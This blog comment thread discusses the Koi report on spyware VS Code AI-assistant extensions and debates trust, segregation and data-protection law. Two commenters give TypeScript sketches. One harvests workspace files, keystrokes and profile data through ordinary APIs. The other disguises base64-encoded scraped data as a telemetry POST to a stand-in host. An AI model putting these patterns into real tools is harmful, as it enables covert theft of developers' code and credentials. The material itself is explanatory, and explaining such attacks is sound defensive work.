Comments

Clive Robinson February 2, 2026 8:50 AM

@ ALL,

From the article, linked to by our host @Bruce, we find,

“AI coding assistants are everywhere. They suggest code, explain errors, write functions, review pull requests. Every developer marketplace is flooded with them – ChatGPT wrappers, Copilot alternatives, code completion tools promising to 10x your productivity.

We install them without a second thought. They’re in the official marketplace. They have thousands of reviews. They work. So we grant them access to our workspaces, our files, our keystrokes – and assume they’re only using that access to help us code.

Not all of them are.”

That last sentence of the quote is “inaccurate”, because unless you

1, Run everything locally, which few know how to do…
2, With proper precautions, which few know how to do…

Then,

“All of the Current AI LLM agents are helping themselves to your IP, for their owners’ benefit, not yours”.

It’s what you might now call,

“The Standard model of LLM Surveillance operation”

To “betray” in multiple ways as the end game…

KC February 2, 2026 11:08 AM

re: AI coding assistants

Can Koi review all the AI coding assistants?

Here, Koi says their risk engine identified a spyware campaign within two VS Code extensions.

It has three data exfiltration channels:

  • Real-time monitoring
  • Mass file harvesting
  • Profiling engine

These particular AI extensions — ChatGPT – 中文版 and ChatMoss (CodeMoss) — can grab up to 50 files at a time, including your “secrets, your credentials, your proprietary code.”

And with data profiling they know “who you are, where you are, what company you work for, what you’re working on, what projects matter most to you.”
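None of this needs an exploit; the ordinary VS Code extension API already grants that level of access the moment an extension activates. Here is a minimal sketch (hypothetical code, not taken from the Koi report) of how those three channels map onto documented API calls:

```typescript
import * as vscode from 'vscode';

// Minimal sketch of the workspace access any installed extension gets by default.
// These are ordinary, documented VS Code APIs; the code below is illustrative only.
export async function activate(context: vscode.ExtensionContext) {
  // "Mass file harvesting": up to 50 files per query, .env files and keys included.
  const files = await vscode.workspace.findFiles('**/*', '**/node_modules/**', 50);
  for (const uri of files) {
    const bytes = await vscode.workspace.fs.readFile(uri); // secrets, credentials, source
    void bytes; // a malicious extension would ship these bytes to its own server here
  }

  // "Real-time monitoring": every edit in every open document, as it is typed.
  context.subscriptions.push(
    vscode.workspace.onDidChangeTextDocument((e) => {
      const typed = e.contentChanges.map((c) => c.text).join('');
      void typed; // the same exfiltration channel, keystroke by keystroke
    })
  );

  // "Profiling engine": stable machine ID, locale, workspace name.
  const profile = {
    machineId: vscode.env.machineId,
    locale: vscode.env.language,
    workspace: vscode.workspace.name,
  };
  void profile; // who you are, where you are, what you are working on
}
```

The only thing separating a helpful assistant from spyware is what happens to that data after these calls return.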

Astounding. Surprising??

lurker February 2, 2026 1:01 PM

So? You can’t do the job yourself, so you hire somebody to do it. Who? Security 101: do you trust them enough to let them use your bathroom? Will they look in the kitchen on the way through and rifle through the cutlery?

VS Code? Do people actually use that for anything outside social media and advertising? Then using an “AI” assistant is, even if you can’t see it, putting your stuff on somebody else’s computer. What could possibly go wrong?

The astonishing thing about this story is that people are surprised it’s happening.

Rontea February 2, 2026 2:29 PM

This is yet another example of why trust in software supply chains is so fragile. We’ve seen time and again that convenience and popularity—1.5 million installs in this case—don’t translate into security. Extensions like these function as privileged observers of your development environment, and the fact that they silently exfiltrate every file and edit is both predictable and avoidable. Developers need to start treating every plugin, every AI assistant, as untrusted code until proven otherwise. The broader lesson is that our tools are attack surfaces, and the market incentives still reward speed and novelty over scrutiny.

Clive Robinson February 2, 2026 3:27 PM

@ Rontea, ALL,

You make the comment of,

“Developers need to start treating every plugin, every AI assistant, as untrusted code until proven otherwise.”

What if I tell you,

“They can not be proven otherwise.”

Where do you go from there?

The answer is “strong segregation”, the equivalent of “air gapping”.

As some will know, SCIFs are,

1, Not cheap to make.
2, Not at all pleasant to work in.
3, Expensive to run.

OK, you might think you do not need that level of “protection”, but the reality is that Current AI LLM & ML systems for coding will be aware of every segregation-breaching technique on the Internet from the time it was fed into the “wood chipper maw” of the ML system.

They will also be aware of just about every code/cipher system algorithm out there in user-land.

Thus they will know how to apply every type of “Data obfuscation technique” you’ve ever heard of up to that point in time, and then some you’ve not.
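To make that concrete, here is a hypothetical sketch (invented endpoint and field names, nothing from any real report) of why inspection alone cannot deliver the “proven otherwise” above: once scraped data is wrapped in what looks like a routine telemetry ping, a human reviewer has little obvious to object to.

```typescript
// Hypothetical sketch: exfiltration dressed up as telemetry (Node-side TypeScript).
// "scraped" stands in for whatever the tool has already read from the workspace.
const scraped = JSON.stringify({ files: ['...'], edits: ['...'] });
const session = Buffer.from(scraped).toString('base64'); // opaque blob, reads like a session ID

// To a reviewer this looks like an ordinary usage ping; the URL is deliberately unresolvable.
fetch('https://telemetry.example.invalid/v1/ping', {
  method: 'POST',
  headers: { 'content-type': 'application/json' },
  body: JSON.stringify({ event: 'editor_open', session }),
}).catch(() => { /* fire and forget, as real telemetry often is */ });
```

And base64 is the crude version; a model trained on the public Internet has seen far subtler encodings than that.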

Just something to think about.

Tony February 2, 2026 6:20 PM

Sounds like a win for open source over closed source. If you plan to publish all your source code, then bits of it sneaking off to China (or elsewhere) during development isn’t as much of a problem as it is for closed source.

lurker February 2, 2026 10:34 PM

@Tony

Whether you are Jedi or not, in this case the source isn’t the prize. They’re after your contacts list, your diary, lunch vouchers, pr0n; it’s amazing the uses they can find for that stuff…

Jesse Thompson February 7, 2026 1:33 PM

  1. Have strong data protection laws that guarantee the autonomy of flesh and blood human citizens FIRST (and only non-government organizations and corporations a distant SECOND)
  2. Have the fabric of your economic infrastructure rent to pieces by foreign military intelligence, organized crime cartels, blackmailers, and saboteurs

National policy can literally only pick one of these two outcomes. Notice that “build a NOBUS panopticon to house your population in” is not directly one of the options: attempts to do so only guarantee outcome number two.

Clive Robinson February 7, 2026 3:25 PM

@ Jesse Thompson,

With regards,

“Have strong data protection laws that guarantee the autonomy of flesh and blood human citizens FIRST (and only non-government organizations and corporations a distant SECOND)”

Yes, you are right in this notion, but the way you are expressing it is wrong and thus introduces the effects of,

“The law of unexpected consequences”.

It’s why in the EU they make the distinction in a different –but still wrong– way of,

“Any person natural or legal”.

If you consider for a moment, between humans and legal entities lies the whole of the natural world, which also needs protection in oh so many ways, as much for humans in general as for nature itself[1].

Thus I think your point needs to be more,

“Have strong data protection laws that guarantee the autonomy of flesh and blood human citizens FIRST (and only non-government organizations and corporations a distant THIRD, long after nature and the environment SECOND).”

Though many would argue, with good reason, that as with evolution[1] the survival of nature and the environment should come a very strong FIRST, otherwise we all die[2]…

[1] For the sake of “profit” by corporations we are “eradicating species” at an astounding rate. All species have a niche in nature whose importance often outweighs what it appears to be at first sight.

To see this, consider insect species: even the hated wasps serve a useful purpose. But many lump them and bees together, which is kind of a “cats are dogs” problem for many humans.

Bees, however, are among the most important pollinators. Without them many plants would die out fairly quickly; then the herbivores that eat those plants would die out or cause issues for other herbivores. Then of course you have the omnivores and carnivores that rely on the herbivores and omnivores as a food source, which is where you find humans. Thus the EU has legislation that protects bees and other insects from corporations, unlike the US. This is one of the reasons there is so much friction between short-term neo-con anti-social thinking and the rest of us who think more socially, and just one of the reasons I say,

“Individual Rights -v- Social Responsibility”

Which is what evolution does: it always favours “survival of the species” over “survival of the individual”… Thus it’s very much toward the “Social Responsibility” end of the spectrum…

[2] No, this does not make me a “green nut bar”, just a responsible human and parent, who also happens to believe in the innate goodness of most humans and to want a future for mine and others’ children and grandchildren, so they can go on to explore and enjoy the natural world, the environment, and life itself. Which, when you think about it, we cannot do if we are extinct from the stupidity of the short-term thinking of neo-con “self-entitled” behaviour.

Philippe Delvaux February 16, 2026 7:56 AM

From a non-USA perspective, is it better that the AI tool sends code to China or to the USA? …
